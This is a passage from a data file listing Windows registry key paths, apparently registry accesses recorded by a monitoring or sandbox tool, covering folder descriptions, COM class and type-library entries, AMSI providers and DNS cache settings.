"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\InfoTip", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\LocalizedName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Icon", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\StreamResourceType", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\LocalRedirectOnly", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PreCreate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\FolderTypeID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\InitFolderHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PropertyBag", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Category", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Name", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\ParentFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Description", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\RelativePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\ParsingName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\InfoTip", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\LocalizedName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Icon", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\StreamResourceType", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\LocalRedirectOnly", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PreCreate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\FolderTypeID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\InitFolderHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PropertyBag", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Category", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Name", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParentFolder", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Description", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\RelativePath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParsingName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InfoTip", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalizedName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Icon", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Security", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResource", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResourceType", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalRedirectOnly", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Roamable", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PreCreate", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Stream", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PublishExpandedPath", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\DefinitionFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Attributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\FolderTypeID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InitFolderHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PropertyBag", "HKEY_LOCAL_MACHINE\\Software\\Classes\\PackagedCom", "HKEY_CURRENT_USER\\Software\\Classes", "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\419", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\19", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64", "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64\\(Default)", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\Codepage", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\1252", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\en-US", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\en", "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\{027947E1-D731-11CE-A357-000000000001}", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{027947E1-D731-11CE-A357-000000000001}\\ProxyStubClsid32", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{027947E1-D731-11CE-A357-000000000001}\\ProxyStubClsid32\\(Default)", "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}", "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\ActivateOnHostFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\InprocServer32", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\ThreadingModel", "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler32", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler32", "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\LocalServer32", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\AppID", "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\LocalServer", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\LocalServer", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\Elevation", "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32\\(Default)", "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32\\(Default)", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\AMSI\\Providers", "HKEY_LOCAL_MACHINE\\Software\\Classes\\CLSID\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\\InprocServer32", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64", "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64\\(Default)", "HKEY_CURRENT_USER\\Software\\Classes\\WinHttp.WinHttpRequest.5.1", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID\\(Default)", "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2087C2F4-2CEF-4953-A8AB-66779B670495}", "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\TreatAs", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\TreatAs", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\ActivateOnHostFlags", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\(Default)", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocServer32", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\InprocServer32", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\(Default)", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\ThreadingModel", "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler32", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler32", "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\TenantRestrictions\\Payload", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters", "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\DnsClient", "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\DNS", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryAdapterName", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DisableAdapterDomainName", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseDomainNameDevolution", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UseDomainNameDevolution", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DomainNameDevolutionLevel", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\PrioritizeRecordData", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\PrioritizeRecordData", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AllowUnqualifiedQuery", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\AllowUnqualifiedQuery", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AppendToMultiLabelName", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenBadTlds", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenUnreachableServers", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenDefaultServers", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DynamicServerQueryOrder", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\FilterClusterIp", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\WaitForNameErrorOnAll", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseEdns", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsSecureNameQueryFallback", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableDAForAllNetworks", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessQueryOrder", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryIpMatching", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationTtl", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationTTL", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationRefreshInterval", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationRefreshInterval", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationMaxAddressCount", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\MaxNumberOfAddressesToRegister", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateSecurityLevel", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UpdateSecurityLevel", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateTopLevelDomainZones", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DowncaseSpnCauseApiOwnerIsTooLazy", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationOverwrite", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheSize", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheTtl", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxNegativeCacheTtl", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AdapterTimeoutLimit", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ServerPriorityTimeLimit", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCachedSockets", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableServerUnreachability", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMulticast", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastResponderFlags", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderFlags", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderMaxTimeout", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMDNS", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsTest", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseCompartments", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\CacheAllCompartments", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseNewRegistration", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistration", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistrationOnly", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\NewDhcpSrvRegistration", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessPreferLocal", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableIdnEncoding", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableIdnMapping", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ShortnameProxyDefault", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableNRPTForAdapterRegistration", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutHistoryLength", 